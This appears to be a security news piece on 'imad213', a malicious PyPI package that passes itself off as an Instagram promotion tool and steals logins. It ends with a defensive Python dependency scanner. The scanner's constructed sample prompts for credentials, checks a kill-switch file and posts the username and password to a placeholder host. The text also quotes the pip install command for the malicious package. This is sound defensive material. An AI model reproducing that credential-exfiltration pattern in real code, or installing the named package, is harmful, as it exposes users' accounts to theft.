A malicious Python package called “imad213” disguised as an Instagram promotion tool steals user logins and sends them to ten Turkish bot services at once. The campaign, which targets millions of users, demonstrates that the thirst for likes is a new entry point for hackers.

Cybercriminals have launched a large-scale social engineering attack on Instagram users, using a harmless-looking PyPI package called “imad213”. The attackers created a plausible GitHub project with seemingly legitimate instructions: after installing it via pip install imad213, the user is asked to enter their Instagram credentials in the console, supposedly to “launch promotion”.
The package also has a kill switch, which the attackers can activate via a file hosted on Netlify, instantly disabling all instances of the malicious code. The discovery was made by the analysis platform Socket.dev, which links the case to the cybercriminal IMAD-213, operating via email [[email protected]].
The attack exploits the social instinct for self-affirmation on Instagram. In 2025, with the platform counting over 2 billion active users, the market for engagement-boosting services is not only profitable but also a dangerous field for phishing operations. The domain infrastructure, which has remained active since 2021, points not to a one-time attack but to a long-term, well-organized criminal network spanning a number of platforms.
The “imad213” case is a prime example of how easily hackers can infiltrate the PyPI environment by turning a user’s greed against them. If your cyber hygiene is based only on superficial trust in GitHub or PyPI, you are a target. Any package that asks for personal information in the console should be automatically blocked. It is now time to tighten internal security policies, automate checks for suspicious dependencies, and educate users on the psychology of phishing.
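One way to automate the dependency check described above, as an added example that is not code from Socket.dev or from the package itself: a static scan of a package's Python source that flags the combination this campaign relies on, a console prompt for credentials plus outbound HTTP calls. The sample source, the example.invalid URLs and the keyword lists are constructed assumptions.

```python
import ast

CRED_WORDS = ("password", "passwd", "username", "login")   # assumed keyword list
HTTP_MODULES = {"requests", "httpx", "urllib", "urllib3", "aiohttp", "http"}
PROMPT_FUNCS = {"input", "getpass"}

# Constructed sample of the pattern the article describes (not the real package code).
SAMPLE = '''
import requests
from getpass import getpass

user = input("Instagram username: ")
pw = getpass("Instagram password: ")
if requests.get("https://example.invalid/status.txt").text.strip() == "on":
    requests.post("https://example.invalid/boost", data={"u": user, "p": pw})
'''

def _call_name(node):
    """Return the dotted name of a call target, e.g. 'requests.post'."""
    parts, f = [], node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if isinstance(f, ast.Name):
        parts.append(f.id)
    return ".".join(reversed(parts))

def scan_source(source):
    """Flag code that prompts for credentials and also makes HTTP calls.
    Heuristic only: import aliases and obfuscated calls are not resolved."""
    findings = {"credential_prompts": [], "http_calls": []}
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        root, leaf = name.split(".")[0], name.split(".")[-1]
        if leaf in PROMPT_FUNCS:
            text = " ".join(a.value.lower() for a in node.args
                            if isinstance(a, ast.Constant) and isinstance(a.value, str))
            if leaf == "getpass" or any(w in text for w in CRED_WORDS):
                findings["credential_prompts"].append((node.lineno, name))
        elif root in HTTP_MODULES:
            findings["http_calls"].append((node.lineno, name))
    findings["suspicious"] = bool(findings["credential_prompts"] and findings["http_calls"])
    return findings

if __name__ == "__main__":
    print(scan_source(SAMPLE))
```

A hit from a scan like this is a reason to hold the dependency for manual review before installation, not proof of malice on its own.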